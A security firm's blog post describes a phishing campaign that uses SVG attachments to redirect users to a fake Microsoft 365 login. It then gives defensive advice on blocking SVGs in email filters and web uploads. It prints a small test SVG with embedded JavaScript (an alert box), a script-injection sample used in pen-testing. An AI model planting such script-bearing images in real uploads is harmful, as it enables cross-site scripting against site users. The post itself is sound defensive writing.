The threat of SVG files
As recently covered by RiskyBiz , attackers sending phishing emails have suddenly discovered what can be done with attaching malicious SVG images. We saw this with a customer last week, so I thought it worth a quick blog.
In our case, five of the more prominent users from one customer organisation all received similar emails, which purport to be a TODO message to themselves, with no body content but with an SVG attached:
The email fails DMARC and SPF checks, so should end up in Junk or Quarantine for users with a decent defensive configuration.
The SVG, if the user clicks on it from the email, will typically open in the default browser. Then the image renders and the script executes, redirecting the user to a fake Microsoft 365 login page:
When we tested it it also had a CAPTCHA-style loading check.
The script itself is only about ten lines long, and uses some string obfuscation shenanigans, using String.fromCharCode to decode a long integer string, which avoids having the malicious domain in plaintext in the script.
SVG technical details
As Adam Boileau said in last week’s Risky Biz podcast :
SVG is to images what HTML is to text…all the functionality of HTML…a whole web document format that happens to be for images.
Vector graphics don’t need to support embedded scripts, but we’ve landed on SVG as the default so we need to deal with them. We can blame Big Vector Graphics lobbying, presumably.
It’s trivial to make a test image, here’s one with a rounded rectangle, but also some Javascript to make an alert box:
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
<script type="text/javascript">
alert(0x539);
</script>
</svg>
Open it in a browser and you get an alert box:
We routinely check for sensible handling of SVG files in any upload functionality in a web app pen-test. As ever, the big danger is from untrusted user content.
Detection and prevention of malicious SVG files
From a technical perspective it’s easy to spot script content in SVG files. And given the whole file is text, you can even open one in Notepad.
The easiest approach to defence is outright blocking them, but any tool or application inspecting their content should be able to spot and remove any script content.
Email applications
The strongest measure is to configure your email protections (e.g. Microsoft 365, Mimecast, Proofpoint or whatever) to block SVG files. For example, in Microsoft 365 you can add additional file extensions to the Common Attachment Filter admin page (which is in the Anti-Malware threat policies page, not the Safe Attachments one).
Blocking them outright may cause issues if you’re working with external designers or website people, who do like to use them because they scale uniformly. But that’s where apps like Hexiosec Transfer make it easy to send big files on request, without having to deal with email attachments (although end-to-end encryption means we can’t inspect sent files for badness).
Web applications
Many web applications that accept image upload won’t accept SVG files, and will block their upload based on the file extension. The above examples show how easy it is to spot the script content, and while you can obfuscate the Javascript you must have it in the script tags.
Related Posts
